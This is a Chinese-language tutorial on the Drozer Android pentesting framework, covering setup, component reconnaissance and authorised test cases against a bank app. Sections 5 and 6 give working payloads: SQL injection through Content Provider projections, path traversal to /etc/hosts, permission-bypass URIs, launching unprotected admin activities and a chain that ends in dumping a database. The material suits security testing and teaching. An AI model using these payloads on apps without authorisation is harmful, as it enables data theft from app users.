Drozer实战指南：从环境搭建到渗透测试全流程解析

1. 环境准备：搭建Drozer渗透测试基础平台

Drozer作为安卓安全测试的瑞士军刀，环境搭建是新手遇到的第一个门槛。我见过太多人卡在环境配置这一步就放弃了，其实只要掌握几个关键点就能轻松搞定。先说说我的环境选择：Windows 10系统 + Python 2.7.18 + Java 8 + 夜神模拟器7.0.5.8，这套组合经过我20多次不同环境测试最稳定。

1.1 Python环境避坑指南

Python版本选择是个大坑！最新版Python 3.x完全不兼容Drozer，必须使用Python 2.7.x系列。实测2.7.18版本问题最少，其他版本可能会遇到：

• 缺少pip模块（尤其是2.7.9之前的版本）
• protobuf库安装失败（这个错误提示非常隐晦）
• twisted库版本冲突

安装时记得勾选"Add python.exe to Path"，这样能省去手动配置环境变量的麻烦。安装完成后一定要验证：

python --version pip --version

如果出现"不是内部命令"的提示，说明环境变量没配好。这时候需要手动添加Python安装目录和Scripts目录到系统Path中，比如我的路径是：

C:\Python27 C:\Python27\Scripts

1.2 Java环境配置细节

推荐使用JDK 8（jdk1.8.0_201），这是与Drozer兼容性最好的版本。安装时注意三点：

1. 不要用默认的Program Files路径，建议直接装到D:\Java\jdk1.8.0_201
2. 配置三个关键环境变量：

JAVA_HOME = D:\Java\jdk1.8.0_201 CLASSPATH = .;%JAVA_HOME%\lib\dt.jar;%JAVA_HOME%\lib\tools.jar; Path追加 = %JAVA_HOME%\bin;%JAVA_HOME%\jre\bin

3. 验证时用管理员权限运行cmd，执行：

java -version javac -version

常见错误是分号用中文标点，或者路径中有空格没加引号。有次我遇到验证通过但Drozer报错的情况，最后发现是同时安装了多个Java版本导致冲突。

1.3 模拟器选择与优化

虽然可以用真机测试，但模拟器更方便批量操作。夜神模拟器对Drozer支持最好，但要注意：

• 必须使用Android 5.0-7.1之间的系统镜像
• 分配至少2核CPU和2048MB内存
• 关闭模拟器的root权限（与实际攻击场景更吻合）

安装后先在模拟器设置里开启开发者选项（连续点击版本号7次），然后启用USB调试。有个小技巧：在模拟器属性里把"使用独立显卡"勾上，能显著提升运行流畅度。

2. 核心组件安装与配置

2.1 ADB工具链部署

ADB是连接模拟器的桥梁，推荐使用独立adb工具包而不是Android Studio自带的版本。关键步骤：

1. 下载adb.zip解压到Python的Scripts目录下
2. 配置环境变量Path追加：

C:\Python27\Scripts\adb

3. 测试连接：

adb connect 127.0.0.1:62001 # 夜神默认端口 adb devices

常见问题adb版本冲突的解决方法很巧妙：把下载的adb.exe重命名为nox_adb.exe，替换掉夜神模拟器bin目录下的原文件。这个坑我踩过三次才找到解决方案。

2.2 Drozer主程序安装

从GitHub下载drozer-2.4.4.msi时要注意：

• 安装路径必须指定到Python目录下（如C:\Python27）
• 安装完成后检查是否生成drozer.bat文件
• 配套的agent.apk要安装到模拟器（直接拖入窗口自动安装）

有个容易忽略的细节：首次运行前需要安装Python依赖库：

python -m pip install protobuf pyopenssl twisted service_identity

如果下载慢可以加豆瓣源：

pip install -i http://pypi.douban.com/simple/ --trusted-host pypi.douban.com protobuf

3. 渗透测试实战入门

3.1 建立测试连接

启动顺序很重要：

1. 先打开模拟器并解锁屏幕
2. 在drozer-agent应用中开启服务
3. 执行端口转发：

adb forward tcp:31415 tcp:31415

4. 启动控制台：

drozer.bat console connect

成功连接会显示设备ID和提示符"dz>"。我遇到过连接超时的情况，通常是端口被占用，重启模拟器就能解决。

3.2 基础信息收集

连接成功后先运行这几个命令：

run app.package.list # 列出所有应用 run app.package.info -a com.example.app # 查看目标应用详情 run scanner.misc.native # 检测native组件

这些信息能帮我们快速定位攻击面。有个实用技巧：用grep过滤结果，比如找含"bank"关键字的应用：

run app.package.list | grep bank

3.3 组件漏洞探测

Drozer最强大的功能是四大组件测试：

run app.activity.info -a com.example.app # 暴露的Activity run app.provider.info -a com.example.app # 可访问的Content Provider run app.service.info -a com.example.app # 运行中的Service run app.broadcast.info -a com.example.app # 广播接收器

对于发现的暴露组件，可以直接发起攻击测试。比如启动未保护的Activity：

run app.activity.start --component com.example.app com.example.app.AdminActivity

4. 常见问题深度解析

4.1 Python环境疑难杂症

protobuf库报错是最常见的问题，症状是：

ImportError: cannot import name symbol_database

解决方法分三步：

1. 卸载现有版本：

pip uninstall protobuf

2. 安装指定版本：

pip install protobuf==2.6.1

3. 清理.pyc缓存文件

4.2 ADB连接异常处理

当出现"device offline"时，可以尝试：

1. 重启adb服务：

adb kill-server adb start-server

2. 检查模拟器端口（夜神62001，MuMu 7555，蓝叠5555）
3. 关闭电脑上的手机助手类软件

4.3 Drozer控制台闪退

这种情况通常是因为：

• Python路径包含中文或空格
• 缺少VC++ 2008运行库
• 防火墙拦截了31415端口

建议的排查步骤：

1. 以管理员身份运行cmd
2. 检查环境变量PATH中的Python路径
3. 查看Windows事件查看器中的错误日志

5. 进阶渗透技巧

5.1 自动化攻击脚本

Drozer支持Python脚本扩展，比如自动化检测SQL注入：

from drozer.modules import Module class SQLiScanner(Module): def execute(self, arguments): providers = self.get_providers() for provider in providers: self.test_sqli(provider) def test_sqli(self, uri): try: self.contentResolver.query(uri + "'", None, None, None, None) self.stdout.write("Vulnerable: %s\n" % uri) except: pass

保存为sqli_scanner.py，通过以下命令加载：

module import /path/to/sqli_scanner.py run scanner.sqli

5.2 权限提升漏洞挖掘

检查应用导出的Content Provider是否存在权限绕过：

run app.provider.query content://com.example.app.provider/users --projection "* FROM SQLITE_MASTER WHERE type='table';--"

如果返回数据库结构，说明存在SQL注入漏洞。更隐蔽的方法是检测File Provider目录穿越：

run app.provider.read content://com.example.app.fileprovider/../../../../etc/hosts

5.3 绕过SSL证书校验

在测试HTTPS通信时，可以用Drozer的中间人攻击模块：

run auxiliary.webmitm

配合Burp Suite使用效果更好。记得先在模拟器安装Burp的CA证书，并将代理设置为电脑IP:8080。

6. 实战案例演示

6.1 银行APP漏洞挖掘

以某银行APP为例（已获授权测试），完整流程：

1. 反编译APK获取包名：com.example.bank
2. 查找暴露的Activity：

run app.activity.info -a com.example.bank

3. 发现未受保护的AdminActivity：

run app.activity.start --component com.example.bank com.example.bank.AdminActivity

4. 成功进入后台管理界面

6.2 数据泄露漏洞利用

通过Content Provider获取用户数据：

run app.provider.query content://com.example.app.provider/users

如果返回"Permission Denied"，尝试URI绕过：

run app.provider.query content://com.example.app.provider/users/..

6.3 组合攻击案例

结合多个漏洞完成攻击链：

1. 通过Activity跳转绕过登录
2. 利用File Provider下载配置文件
3. 从配置文件中获取数据库密码
4. 通过SQL注入导出全部数据

这种实战场景下，Drozer的批处理模式特别有用：

drozer.bat console connect -c "run script.py"

7. 安全防护建议

7.1 开发防护方案

根据Drozer的检测结果，开发者应该：

• 为所有组件设置android:exported="false"
• 对导出的组件实施签名级权限控制
• 使用StrictMode防止File Provider穿越
• 对Content Provider输入做严格过滤

7.2 测试优化技巧

提升测试效率的方法：

• 使用--no-color参数减少输出干扰
• 通过-o report.html生成可视化报告
• 结合frida进行动态hook
• 编写自定义模块实现自动化测试

7.3 持续学习资源

推荐进阶学习路径：

1. 官方文档：https://labs.withsecure.com/tools/drozer
2. GitHub上的社区模块：https://github.com/drozer/modules
3. OWASP Mobile Testing Guide
4. 每年更新的Mobile PENTEST标准

记得每次测试前都要获取书面授权，我在某次企业测试中曾因未授权测试差点引发法律纠纷。实际使用时建议搭配Genymotion模拟器和Burp Suite组成完整的移动安全测试环境。